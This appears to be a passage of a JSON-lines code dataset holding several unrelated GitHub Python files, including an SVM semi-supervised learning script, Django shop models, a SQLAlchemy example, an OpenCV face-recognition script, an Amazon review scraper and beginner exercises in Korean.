'letsencrypt': {\n 'path': '/etc/letsencrypt/live/'\n },\n # odoo_addons allow to install odoo base tools\n 'odoo_addons': [\n 'account', # Invoicing\n 'account_accountant', # Accounting and Finance\n 'crm',\n 'l10n_ch', # Switzerland - Accounting\n 'mail', # Discuss\n 'website',\n ],\n 'addons': [\n {\n 'type' : 'git',\n 'url' : 'https://github.com/OCA/l10n-switzerland.git',\n 'branch' : '10.0',\n 'group' : 'l10n-switzerland_oca',\n 'add_path' : 'l10n-switzerland_oca',\n 'names' : [\n 'l10n_ch_states',\n 'l10n_ch_bank',\n 'l10n_ch_base_bank',\n 'l10n_ch_payment_slip']\n },\n {\n 'type' : 'git',\n 'url' : 'https://github.com/OCA/bank-payment.git',\n 'branch' : '10.0',\n 'group' : 'bank_payment',\n 'add_path' : 'bank_payment',\n 'names' : ['account_payment_partner'],\n },\n {\n 'type' : 'git',\n 'url' : 'https://github.com/OCA/bank-statement-reconcile.git',\n 'branch' : '10.0',\n 'group' : 'bank_statement_reconcile',\n 'add_path' : 'bank_statement_reconcile',\n 'names' : ['base_transaction_id'],\n },\n ],\n 'tags': {\n # ***********************************\n # a dictonary pointing to tags to be\n # used for addons.\n # tags found here have lower precendence\n # the the ones found in the addon section\n # ***********************************\n # 'module_x' : 'vXXX',\n },\n 'skip': {\n # the addons to skip when installing\n # the name is looked up in the addon stanza in the following sequence:\n # - name\n # - add_path\n # - group\n 'addons': [],\n # skip when it is installed\n 'updates': [],\n },\n # extra libraries needed to be installed by pip or apt\n # this is used in two places\n # 1. pip installs are executed when creating a site on the local computer\n # and executing bin/dosetup [-f] in the sites buildout directory\n # 2. both pip and apt installs are executed when a docker image is created\n 'extra_libs': {\n # 'pip' : [\n # 'xmlsec',\n # 'scrapy',\n # 'html2text',\n # ],\n # 'apt' : [\n # 'python-dev',\n # 'pkg-config',\n # 'libxml2-dev',\n # 'libxslt1-dev',\n # 'libxmlsec1-dev',\n # 'libffi-dev',\n # ]\n },\n 'develop': {\n 'addons': [],\n },\n # slave info: is this site slave of a master site from which it will be updated\n 'slave_info': {\n # # master_site ist the name of the mastersite\n # # this must be a site in sites.py\n # \"master_site\" : '',\n # # master_domain is the domain from which the master is copied\n # \"master_domain\" : 'localhost',\n }\n },\n\n}\n","repo_name":"westlyou/erp-workbench","sub_path":"presets/divers/presettest.py","file_name":"presettest.py","file_ext":"py","file_size_in_byte":10379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"29502751275","text":"from sklearn.svm import SVC\r\nimport pandas as pd\r\nimport pickle\r\nimport numpy as np\r\nimport os\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.preprocessing import StandardScaler\r\nimport time\r\nfrom sklearn.metrics import accuracy_score\r\nimport math\r\n\r\n\r\nclass svm_ssl(object):\r\n def __init__(self, split_number_u, system, s_number):\r\n self.split_number_u = self.split_number_l = split_number_u\r\n self.system = system\r\n self.s_number = 10 \r\n\r\n self.test_number = 50\r\n self.flag = True\r\n self.SVM1 = SVC(random_state=0, C=1.0, kernel='rbf', class_weight='balanced', probability=True)\r\n self.SVM2 = SVC(random_state=0, C=1.0, kernel='rbf', class_weight='balanced', probability=True)\r\n # self.model_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),\r\n # '{}/svm_ssl_model.pickle'.format(system))\r\n # self.scalar_model_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),\r\n # '{}/svm_ssl_scalar.pickle'.format(system))\r\n\r\n self.test_data_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),\r\n '{}/{}_test_data.csv'.format(system, system))\r\n self.data_L_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),\r\n '{}/{}/{}_{}_data_L.csv'.format(system, s_number, system, self.split_number_u))\r\n\r\n self.data_U_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),\r\n '{}/{}/{}_{}_data_U.csv'.format(system, s_number, system, self.split_number_u))\r\n\r\n def data_in(self, data):\r\n columns = list(data.columns)\r\n data = data.drop('label', 1)\r\n # print(data)\r\n return data\r\n\r\n def fit_svm1(self, data, model):\r\n Y = data.iloc[:, -1].values.astype(int)\r\n if len(np.unique(Y)) == 1:\r\n data = pd.concat((data, data.iloc[-1:, :]), axis=0)\r\n Y = data.iloc[:, -1].values.astype(int)\r\n Y[-1] = abs(Y[-1] - 1)\r\n X = self.data_in(data)\r\n X = X.values\r\n scalar = StandardScaler()\r\n X = scalar.fit_transform(X)\r\n model = model.fit(X, Y)\r\n return model, scalar\r\n\r\n def fit_svm2(self, data, model):\r\n Y = data.iloc[:, -1].values.astype(int)\r\n if len(np.unique(Y)) == 1:\r\n data = pd.concat((data, data.iloc[-1:, :]), axis=0)\r\n Y = data.iloc[:, -1].values.astype(int)\r\n Y[-1] = abs(Y[-1] - 1)\r\n\r\n X = self.data_in(data)\r\n X = X.values\r\n scalar = StandardScaler()\r\n X = scalar.fit_transform(X)\r\n model = model.fit(X, Y)\r\n return model, scalar\r\n\r\n def one_train(self, svm1, svm2, data_L, data_U, data_S):\r\n # permutation = np.random.permutation(len(data_L))\r\n\r\n data_L1 = data_L.iloc[:int(len(data_L) / 2), :]\r\n data_L2 = data_L.iloc[int(len(data_L) / 2):, :]\r\n svm1_train_data = pd.concat((data_L1, data_S), axis=0)\r\n svm1_train_data = svm1_train_data.reset_index(drop=True)\r\n\r\n svm1, scalar1 = self.fit_svm1(svm1_train_data, svm1)\r\n svm2, scalar2 = self.fit_svm2(data_L2, svm2)\r\n\r\n U_and_S_data = pd.concat((data_U, data_S), axis=0)\r\n U_and_S_data = U_and_S_data.reset_index(drop=True)\r\n\r\n test_data_process = self.data_in(U_and_S_data)\r\n test_data_process1 = scalar1.transform(test_data_process)\r\n test_data_process2 = scalar2.transform(test_data_process)\r\n\r\n predict1 = svm1.predict(test_data_process1)\r\n predict2 = svm2.predict(test_data_process2)\r\n probility2 = svm1.predict_proba(test_data_process1)\r\n probility2 = np.array([max(i) for i in probility2])\r\n\r\n index_new_S = []\r\n i = 0\r\n for x, y in zip(list(predict1), list(predict2)):\r\n if x == y:\r\n index_new_S.append(i)\r\n i += 1\r\n\r\n data_S = U_and_S_data.iloc[index_new_S, :] \r\n probility2 = probility2[index_new_S]\r\n\r\n # print(data_S)\r\n predict_values = predict1[index_new_S]\r\n true_value = list(data_S.iloc[:, -1])\r\n\r\n data_S = data_S.iloc[:, :-1]\r\n data_S['label'] = np.array(predict_values)\r\n\r\n data_S = data_S.reset_index(drop=True)\r\n if len(data_S) > self.s_number and self.flag:\r\n # index = np.argpartition(probility2, len(probility2) - self.s_number)\r\n # index = index[-self.s_number:]\r\n # list_choose_s = index\r\n index = np.argsort(probility2)\r\n list_choose_s = index[-self.s_number:]\r\n else:\r\n list_choose_s = range(len(data_S))\r\n\r\n data_S = data_S.iloc[list_choose_s, :]\r\n data_S = data_S.reset_index(drop=True)\r\n\r\n dengyu = sum(predict_values[list_choose_s] == np.array(true_value)[list_choose_s])\r\n index_new_S = [index_new_S[i] for i in list_choose_s] \r\n data_U = U_and_S_data.drop(index=index_new_S) \r\n data_U = data_U.reset_index(drop=True)\r\n data_L = data_L.reset_index(drop=True)\r\n\r\n return svm1, svm2, data_L, data_U, data_S, scalar1\r\n\r\n def train(self):\r\n data_L = pd.read_csv(self.data_L_path)\r\n # data_L = data_L.sample(frac=split_number).reset_index(drop=True)\r\n data_U = pd.read_csv(self.data_U_path)\r\n # data_U = data_U.sample(frac=split_number).reset_index(drop=True)\r\n\r\n final_data_l = data_L.iloc[:, :]\r\n\r\n test_data = pd.read_csv(self.test_data_path)\r\n\r\n data_S = pd.DataFrame(columns=data_L.columns)\r\n epoch = 0\r\n\r\n while (not data_U.empty) and epoch < 10:\r\n self.SVM1, self.SVM2, data_L, data_U, data_S, scalar1 = self.one_train(self.SVM1, self.SVM2, data_L, data_U,\r\n data_S)\r\n epoch += 1\r\n self.test(self.SVM1, test_data, scalar1)\r\n\r\n svm1_train_data = pd.concat((data_L, data_S), axis=0)\r\n svm1_train_data = svm1_train_data.reset_index(drop=True)\r\n\r\n svm1, scalar = self.fit_svm1(svm1_train_data, self.SVM1)\r\n\r\n accuracy, rank_avg, rd_loss_max, rd_loss_min = self.test(svm1, test_data, scalar)\r\n # return svm1, test_data, scalar\r\n return accuracy, rank_avg, rd_loss_max, rd_loss_min\r\n\r\n def rank_test(self, predict, true_y, test_number):\r\n predict_rank = {}\r\n true_rank = {}\r\n for i in range(test_number):\r\n predict_rank[i] = [0, 0]\r\n true_rank[i] = [0, 0]\r\n\r\n number_index = 0\r\n for i in range(test_number):\r\n for j in range(i + 1, test_number):\r\n if predict[number_index] == 1:\r\n predict_rank[i][1] += 1\r\n predict_rank[j][0] += 1\r\n else:\r\n predict_rank[i][0] += 1\r\n predict_rank[j][1] += 1\r\n\r\n if true_y[number_index] == 1:\r\n true_rank[i][1] += 1\r\n true_rank[j][0] += 1\r\n else:\r\n true_rank[i][0] += 1\r\n true_rank[j][1] += 1\r\n number_index += 1\r\n\r\n rank_avg = 0\r\n rd_loss_max = 0\r\n rd_loss_min = 0\r\n\r\n for i in range(len(predict_rank)):\r\n rank_avg += abs(predict_rank[i][0] - true_rank[i][0])\r\n rank_avg = rank_avg / len(predict_rank)\r\n\r\n for i in range(len(predict_rank)):\r\n if true_rank[i][1] == 0:\r\n rd_loss_max = abs(predict_rank[i][0] - true_rank[i][0])\r\n break\r\n\r\n for i in range(len(predict_rank)):\r\n if true_rank[i][0] == 0:\r\n rd_loss_min = abs(predict_rank[i][0] - true_rank[i][0])\r\n break\r\n\r\n return rank_avg, rd_loss_max, rd_loss_min\r\n\r\n def test(self, model, testdata, scalar):\r\n y = testdata.iloc[:, -1].values.astype(int)\r\n\r\n testdataset = self.data_in(testdata)\r\n testdataset = testdataset.reset_index(drop=True)\r\n\r\n X = scalar.transform(testdataset.values)\r\n y_pred = model.predict(X)\r\n rank_avg, rd_loss_max, rd_loss_min = self.rank_test(y_pred, y, self.test_number)\r\n return accuracy_score(y, y_pred), rank_avg, rd_loss_max, rd_loss_min\r\n\r\n\r\ndef system_samplesize(sys_name):\r\n\r\n N_train_all = np.multiply(6, [1, 2, 3])\r\n\r\n return N_train_all\r\n\r\n\r\ndef out_dict_info():\r\n systerm_list = ['hadoopsort', 'hadoopterasort', 'hadoopwordcount', 'mysql',\r\n 'redis', 'sparksort', 'sparkterasort', 'sparkwordcount', 'sqlite', 'tomcat', 'x264']\r\n\r\n s_number_list = [2, 3, 4]\r\n\r\n class multidict(dict):\r\n def __getitem__(self, item):\r\n try:\r\n return dict.__getitem__(self, item)\r\n except KeyError:\r\n value = self[item] = type(self)()\r\n return value\r\n\r\n dict_info = multidict()\r\n\r\n for s_number in s_number_list:\r\n for system in systerm_list:\r\n number_list = system_samplesize(system)\r\n for number in number_list:\r\n\r\n if number % s_number != 0:\r\n half = math.floor(number / s_number)\r\n Q_number = (number - math.floor(number / s_number)) * 20\r\n else:\r\n half = number / s_number\r\n Q_number = math.ceil(number / s_number) * (s_number - 1) * 20\r\n\r\n N = (half * (half - 1) // 2) + Q_number\r\n first = math.ceil(math.sqrt(N * 2))\r\n if first > number:\r\n add_ = number - half\r\n sub_ = (number) * (number - 1) // 2\r\n else:\r\n if first * (first - 1) // 2 < N:\r\n first += 1\r\n\r\n add_ = first - half\r\n if first * (first - 1) // 2 == N:\r\n sub_ = first * (first - 1) // 2\r\n else:\r\n sub_ = first * (first - 1) // 2 - N\r\n sub_ = - sub_\r\n elif first * (first - 1) // 2 == N:\r\n add_ = first - half\r\n sub_ = first * (first - 1) // 2\r\n else:\r\n add_ = first - half\r\n if first * (first - 1) // 2 == N:\r\n sub_ = first * (first - 1) // 2\r\n else:\r\n sub_ = first * (first - 1) // 2 - N\r\n sub_ = - sub_\r\n dict_info[s_number][system][Q_number][number] = [sub_, add_]\r\n return dict_info\r\n\r\nif __name__ == '__main__':\r\n\r\n dict_data = out_dict_info()\r\n systerm_list = ['hadoopsort', 'hadoopterasort', 'hadoopwordcount', 'sparksort', 'sparkterasort', 'sparkwordcount',\r\n 'mysql', 'redis',\r\n 'x264', 'tomcat', 'sqlite']\r\n s_number_list = [2, 3, 4]\r\n\r\n columns = ['Systerm', 'Split_NUMBER', 'NUMBER', 'accuracy', 'rank_avg',\r\n 'rd_loss_max', 'rd_loss_min']\r\n out = pd.DataFrame(columns=columns)\r\n out.to_csv('svm_ssl.csv', index=False)\r\n\r\n for system in systerm_list:\r\n for s_number in s_number_list:\r\n number_list = system_samplesize(system)\r\n for number in number_list:\r\n if number==6:\r\n continue\r\n print(\"---{}---{}----{}-\".format(system, s_number, number))\r\n accuracy, rank_avg, rd_loss_max, rd_loss_min = svm_ssl(number, system, s_number).train()\r\n row = [\r\n [system, s_number, number, accuracy, rank_avg, rd_loss_max,\r\n rd_loss_min]]\r\n out = pd.DataFrame(row)\r\n out.to_csv('svm_ssl.csv', index=False, mode='a+', header=None)\r\n print(\"----------------------\")\r\n","repo_name":"xdbdilab/CM-CASL","sub_path":"code/SSL.py","file_name":"SSL.py","file_ext":"py","file_size_in_byte":12014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"37144035210","text":"from decimal import Decimal\r\nfrom django.db import models\r\nfrom django.core.validators import MaxValueValidator, MinValueValidator\r\nfrom phonenumber_field.modelfields import PhoneNumberField\r\n\r\n\r\nclass receipt_status(models.Model):\r\n name = models.CharField('Название', max_length=50, unique=True)\r\n\r\n class Meta:\r\n verbose_name = 'Статус заказа'\r\n verbose_name_plural = 'Статусы заказов'\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\nclass delivery_type(models.Model):\r\n name = models.CharField('Название', max_length=50, unique=True)\r\n\r\n class Meta:\r\n verbose_name = 'Тип доставки'\r\n verbose_name_plural = 'Типы доставок'\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\nclass role(models.Model):\r\n name = models.CharField('Название', max_length=50, unique=True)\r\n description = models.CharField('Описание', max_length=500, blank=True, null=True)\r\n\r\n class Meta:\r\n verbose_name = 'Роль'\r\n verbose_name_plural = 'Роли'\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\nclass user(models.Model):\r\n login = models.CharField('Логин', max_length=20, unique=True)\r\n password = models.CharField('Пароль', max_length=20)\r\n name = models.CharField('Имя', max_length=20)\r\n phone = PhoneNumberField('Телефон', unique=True)\r\n address = models.CharField('Адрес', max_length=50)\r\n role_id = models.ForeignKey(role, on_delete=models.PROTECT, verbose_name='Роль')\r\n\r\n class Meta:\r\n verbose_name = 'Пользоваатель'\r\n verbose_name_plural = 'Пользоваатели'\r\n\r\n def __str__(self):\r\n return self.login\r\n\r\n\r\nclass receipt(models.Model):\r\n contact = PhoneNumberField('Телефон')\r\n address = models.CharField('Адрес', max_length=50, default='ул. XXXXXXXXXXXX, XX.')\r\n sum_cost = models.DecimalField('Сумма заказа', max_digits=20, decimal_places=2,\r\n validators=[MinValueValidator(Decimal('0.01'))])\r\n status_id = models.ForeignKey(receipt_status, on_delete=models.PROTECT, verbose_name='Статус')\r\n delivery_id = models.ForeignKey(delivery_type, on_delete=models.PROTECT, verbose_name='Тип доставки')\r\n user_id = models.ForeignKey(user, on_delete=models.SET_NULL, verbose_name='Пользователь', null=True, blank=True)\r\n\r\n class Meta:\r\n verbose_name = 'Заказ'\r\n verbose_name_plural = 'Заказы'\r\n\r\n def __str__(self):\r\n return self.address\r\n\r\n\r\nclass product_type(models.Model):\r\n name = models.CharField('Название', max_length=50, unique=True)\r\n\r\n class Meta:\r\n verbose_name = 'Тип товара'\r\n verbose_name_plural = 'Типы товаров'\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\nclass product(models.Model):\r\n name = models.CharField('Название', max_length=50)\r\n price = models.DecimalField('Цена', max_digits=20, decimal_places=2,\r\n validators=[MinValueValidator(Decimal('0.01'))])\r\n amount = models.PositiveIntegerField('Количество')\r\n animal = models.CharField('Животное', max_length=50)\r\n img = models.ImageField('Изображение', upload_to='static/main/img',\r\n default='static/main/img/standart_foto.png')\r\n product_type_id = models.ForeignKey(product_type, on_delete=models.PROTECT, verbose_name='Тип')\r\n\r\n class Meta:\r\n verbose_name = 'Товар'\r\n verbose_name_plural = 'Товары'\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\nclass receipt_has_product(models.Model):\r\n receipt_id = models.ForeignKey(receipt, on_delete=models.CASCADE, verbose_name='Заказ')\r\n product_id = models.ForeignKey(product, on_delete=models.PROTECT, verbose_name='Товар')\r\n price = models.DecimalField('Цена', max_digits=40, decimal_places=2,\r\n validators=[MinValueValidator(Decimal('0.01'))])\r\n amount = models.PositiveIntegerField('Количество', validators=[MinValueValidator(Decimal('1'))])\r\n\r\n class Meta:\r\n unique_together = ('receipt_id', 'product_id')\r\n verbose_name = 'Заказ-продукт'\r\n verbose_name_plural = 'Заказы-продукты'\r\n\r\n # def __str__(self):\r\n # return self.product_id\r\n","repo_name":"vonderbot/Zoolivery","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"72266624177","text":"'''\nTutorial link: https://docs.sqlalchemy.org/en/latest/orm/tutorial.html\nSqlalchemy version: 1.2.15\nPython version: 3.7\n'''\n\nfrom sqlalchemy import create_engine, Column, ForeignKey, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship, sessionmaker\n\nBase = declarative_base()\n\n\nclass UserInfo(Base):\n __tablename__ = 'users_info'\n\n id = Column(Integer, primary_key=True)\n name = Column(String)\n user_id = Column(Integer, ForeignKey('users.id'))\n user = relationship('User')\n\n def __repr__(self): # optional\n return f'UserInfo {self.name}'\n\n\nclass User(Base):\n __tablename__ = 'users' # if you use base it is obligatory\n\n id = Column(Integer, primary_key=True) # obligatory\n name = Column(String)\n password = Column(String)\n\n def __repr__(self): # optional\n return f'User {self.name}'\n\n\nengine = create_engine('sqlite:///:memory:')\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\nBase.metadata.create_all(engine)\n","repo_name":"leportella/sqlalchemy-basics-post","sub_path":"creating_foreign_keys_from_start_JupyterHub_example.py","file_name":"creating_foreign_keys_from_start_JupyterHub_example.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"57"} +{"seq_id":"20730080301","text":"# Can you find and fix the bug?\n\nfrom random import randint\n\ndef assign_jerseys(team):\n roster = {}\n for player in players:\n roster[player] = randint(1, 99)\n return roster\n\nplayers = ['Twi', 'Dottie', 'Thelma']\njersey_numbers = assign_jerseys(team)\nprint(jersey_numbers)\n","repo_name":"catherinedevlin/just-enough-python","sub_path":"080-d-write-function.py","file_name":"080-d-write-function.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"57"} +{"seq_id":"16244308795","text":"import cv2\nfrom cv2 import VideoCapture, CascadeClassifier, Mat\nimport os\nimport zipfile\nimport numpy as np\nfrom PIL import Image\nfrom os.path import exists\n\nSRC_PATH = os.getcwd()\nASSETS_PATH = os.path.join(SRC_PATH, 'Assets')\n\ndef main() -> None:\n \"\"\"Main function. Executes the face detection on the webcam function.\n \"\"\"\n face_recognizer = train_LBPH_Face_Recognizer()\n face_detector_path = os.path.join(os.getcwd(), \"Assets\", \"haarcascade_frontalface_default.xml\")\n face_detector = cv2.CascadeClassifier(face_detector_path)\n camera = cv2.VideoCapture(0)\n width, height, font = 220, 220, cv2.FONT_HERSHEY_COMPLEX_SMALL\n\n analyze_faces_on_camera(camera, face_detector, face_recognizer, width, height, font)\n\n camera.release()\n cv2.destroyAllWindows()\n\n\ndef train_LBPH_Face_Recognizer() -> None:\n \"\"\"Trains the LBPHFaceRecognizer.\n \"\"\"\n if exists(os.path.join(ASSETS_PATH, \"rodrigo_lbph_classifier.yml\")):\n lbph_classifier = cv2.face.LBPHFaceRecognizer_create()\n lbph_classifier.read(os.path.join(ASSETS_PATH, \"rodrigo_lbph_classifier.yml\"))\n else:\n extract_zip_folder()\n ids, faces = pre_process_images()\n lbph_classifier = cv2.face.LBPHFaceRecognizer_create(radius=4, neighbors=14, grid_x=9, grid_y=9)\n lbph_classifier.train(faces, ids)\n lbph_classifier.write(os.path.join(ASSETS_PATH, \"rodrigo_lbph_classifier.yml\"))\n\n return lbph_classifier\n\n\ndef extract_zip_folder() -> None:\n \"\"\"Extracts the zip folder containing the images to be used in the LBPH classifier.\n \"\"\"\n rodrigo_zip_path = os.path.join(ASSETS_PATH, \"rodrigo.zip\")\n zip = zipfile.ZipFile(file=rodrigo_zip_path, mode = 'r')\n zip.extractall(os.path.join(ASSETS_PATH, \"Data\"))\n zip.close()\n\n\ndef pre_process_images() -> tuple[np.ndarray, np.ndarray]:\n \"\"\"Pre-process images from a folder to be used in the LBPH classifier.\n\n Args:\n images_folder_path (str): Path to the folder containing the images.\n \"\"\"\n image_paths = [os.path.join(ASSETS_PATH, \"Data\", \"rodrigo\", img_path) for img_path in os.listdir(os.path.join(ASSETS_PATH, \"Data\", \"rodrigo\"))]\n faces = []\n ids = []\n for path in image_paths:\n image = Image.open(path).convert('L')\n imagem_np = np.array(image, 'uint8')\n id = 1\n ids.append(id)\n faces.append(imagem_np)\n\n return np.array(ids), np.array(faces)\n\n\ndef analyze_faces_on_camera(camera:VideoCapture, face_detector:CascadeClassifier, face_recognizer, width:int, height:int, font:int) -> None:\n \"\"\"Detects faces on camera and draws a rectangle around them. Quits when 'q' is pressed.\n\n Args:\n camera (VideoCapture): Webcam object.\n face_detector (CascadeClassifier): Face detector object.\n \"\"\"\n # Capture frame-by-frame\n while True:\n ret, frame = camera.read()\n\n gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n detections = face_detector.detectMultiScale(gray_frame, minSize=(100, 100),\n minNeighbors=5)\n\n draw_rectangle_around_faces(frame, detections)\n recognize_faces_on_camera(face_recognizer, detections, frame, gray_frame, width, height, font)\n\n cv2.imshow('Video', frame)\n\n # Press 'q' to quit\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n\ndef draw_rectangle_around_faces(frame:Mat, faces:list[tuple]) -> None:\n \"\"\"Draws a rectangle around the faces.\n Args:\n frame (Mat): Frame to draw on.\n faces (list[tuple]): List of faces.\n \"\"\"\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n\ndef recognize_faces_on_camera(face_recognizer, detections:list, image:Mat, gray_image:Mat, width:int, height:int, font:int) -> None:\n for (x, y, w, h) in detections:\n image_face = cv2.resize(gray_image[y:y + w, x:x + h], (width, height))\n cv2.rectangle(image, (x, y), (x + w, y + h), (0,0,255), 2)\n id, confidence = face_recognizer.predict(image_face) \n if id == 1 and confidence < 215:\n name = \"Rodrigo\"\n else:\n name = \"Someone else\"\n cv2.putText(image, name, (x,y +(w+30)), font, 2, (0,0,255))\n cv2.putText(image, str(confidence), (x,y + (h+50)), font, 1, (0,0,255))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"RodrigoSdeCarvalho/FaceRecognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"6880093374","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport pandas as pd\r\nimport dateparser\r\n\r\ndef crawl(url, phone, phone_color, phone_size):\r\n headers = {\r\n 'accept': 'text/html, application/xhtml+xml, image/jxr, */*',\r\n 'accept-encoding': 'gzip, deflate, br',\r\n 'accept-language': 'zh-CN',\r\n 'cookie': 'csm-hit=tb:s-1G0EMWYNQXNPAKKZJ68W|1563272028775&t:1563272029310&adb:adblk_no; session-token=lKKXtd8CUrAFdzfvoajdKtm5nU8VTAR0bD+X/R7nomtrjUIa62TkzUbQ4UWD8p0wDSf1nAuCRSioeFoMUjxYj+ZVAjymfQ7e+1wIXELT7Uk+TMKPlLprrKvleZR5fIZYjfR68pyjTqanYRLGEKEZEg9SSz+VW7c62/vH8q7feTvizAxSOdxJo0TRWqI+a5bC; session-id-time=2082754801l; session-id=260-8533334-2371525; i18n-prefs=EUR; x-wl-uid=1tkaKLVWq9MgwP34Ys3FGSTlQP5bMJMiMviKLm9whkk5vH9npeNn5b9zBPTTdHPyE7RpEpWDGEf8=; ubid-acbde=262-5774505-3025802; lc-acbde=en_GB',\r\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299'\r\n }\r\n\r\n session = requests.Session()\r\n response = session.get(url=url, headers=headers)\r\n soup = BeautifulSoup(response.text, 'lxml')\r\n result = soup.find_all(\"div\", {\"data-hook\": \"review\"})\r\n data = []\r\n for res in result:\r\n username = res.find(\"span\", {\"class\": \"a-profile-name\"}).text\r\n star = res.find(\"span\", {\"class\": \"a-icon-alt\"}).text\r\n title = res.find(\"a\", {\"data-hook\": \"review-title\"}).text\r\n date = res.find(\"span\", {\"data-hook\": \"review-date\"}).text\r\n review = res.find(\"span\", {\"data-hook\": \"review-body\"}).text\r\n\r\n review_date = dateparser.parse(date).date()\r\n review_star = re.findall(r'\\d+', star, flags=0)[0]\r\n review_title = title.strip()\r\n review = review.strip()\r\n res = [phone, phone_size, phone_color, username, review_star, review_title, review_date, review]\r\n data.append(res)\r\n save = pd.DataFrame(data)\r\n save.to_csv(\"D:/data/data_it.csv\", mode='a', index=False, header=False, encoding=\"utf_8_sig\", )\r\n\r\nphone = \"iPhone XS\"\r\nname = \"Apple-iPhone-XS-64GB-siderale\"\r\nid = \"B07HLDMZJZ\"\r\nphone_color = \"Grigio siderale\"\r\nphone_size = \"64GB\"\r\ntotal = 13\r\n\r\nfor i in range(1, (total // 20) + 2):\r\n print(\"正在下载第{}页数据...\".format(i))\r\n # 亚马逊商品评论链接\r\n url = \"https://www.amazon.it/\"+name+\"/product-reviews/\"+id+\"/ref=cm_cr_getr_d_paging_btm_next_\"+str(i)+\"?ie=UTF8&reviewerType=all_reviews&pageNumber=\"+str(i)+\"&pageSize=20\"\r\n print(url)\r\n crawl(url, phone, phone_color, phone_size)\r\n\r\n","repo_name":"bioWzz/Lijian","sub_path":"getdata/getdata_no_style.py","file_name":"getdata_no_style.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"37157869882","text":"data = [list(map(int,input().split())) for _ in range(3)]\r\n\r\nN = int(input())\r\nfor _ in range(N):\r\n bn = int(input())\r\n for i in range(3):\r\n for j in range(3):\r\n if bn == data[i][j]:\r\n data[i][j] = 0\r\nans = \"No\"\r\nfor i in range(3):\r\n if data[i][0] == data[i][1] == data[i][2] == 0:ans = \"Yes\"\r\n if data[0][i] == data[1][i] == data[2][i] == 0:ans = \"Yes\"\r\nif data[0][0] == data[1][1] == data[2][2]==0:ans =\"Yes\"\r\nif data[0][2] == data[1][1] == data[2][0] == 0 :ans=\"Yes\"\r\nprint(ans)","repo_name":"teruto725/atcoder","sub_path":"157/157b.py","file_name":"157b.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"5529347601","text":"#import list\n\n#01. 사용자의 이름을 입력받아서 다음과 같이 출력하라: hello [이름]\nmaname = input(\"enter your name\") #입력된 e.y.n에 나의 이름을 입력한 변수를 저장한 뒤\nprint(\"hello\", maname) #hello 뒤에 이름으로 저장된 변수를 출력\n\n#02. 사용자의 이름을 입력받은 다음 사용자의 성을 입력받아서 다음과 같이 출력하라: hello [이름][성]\nname1 = input(\"enter your first name: \") #이름을 입력받음\nname2 = input(\"enter your last name: \") #성을 입력받음\nprint(\"hello\", name1, name2) #다음과 같이 출력을 할 경우, 출력할 값을 순서대로 쉼표로 연결해줌\n\n#03. \"what do you call a bear with no teeth\" 라는 농담을 치고나서 다음 줄에 \" a gummy bear!\"이라는 문장을 출��하기\nprint(\"What do you call a bear with no teeth?\\nA gummy bear!\")\n\n#04. 사용자로 부터 2개의 숫자를 입력받아서 더한 결과를 다음과 같이 출력하라: the total is [결과]\nintnum1, intnum2 = input(\"enter the any two numbers:\").split()\n#.split()은 공백을 기준으로 앞뒤의 문자열을 쪼개서 리스트로 만들어주는 함수.해당 함수는 각 변수를 문자로 인식.\n#자세하게는 .split(sep, maxsplit)에서 sep이라는 기준(ex. 공백, 쉼표)을 중심으로 maxsplit의 값만큼 문자열을 쪼갠다.\nno1=int(intnum1) #입력된 intnum1,2를 정수의 값으로 저장\nno2=int(intnum2)\ntotal1 = no1+no2 #그 합을 구함\nprint(\"the total is\", total1)\n\n#05.사용자로부터 3개의 숫자를 입력받는다. 첫번째와 두번째 숫자를 더한값에 세번째 값을 곱한결과를 다음과같이 출력하:the answer is[]\na,b,c=input(\"enter the three numbers(seperate to ,):\").split(\",\") #이번에는 쉼표를 기준으로 각 문자를 쪼갠 리스트를 생성\nnum_a=int(a)\nnum_b=int(b)\nnum_c=int(c)\n#ans=(num_a+num_b)*num_c\n#print(\"the answer is\",ans)\nprint(\"the answer is\",(num_a+num_b)*num_c)#따로 더한값을 정의하지않고 출력창에 계산식을 올려 출력\n\n#06. 사용자로 하여금 처음에 가진 피자조각수를 입력받고, 몇조각을 먹었는지 입력받아서 남은 조각수를 입력받아 사람에게 익숙한 형식으로 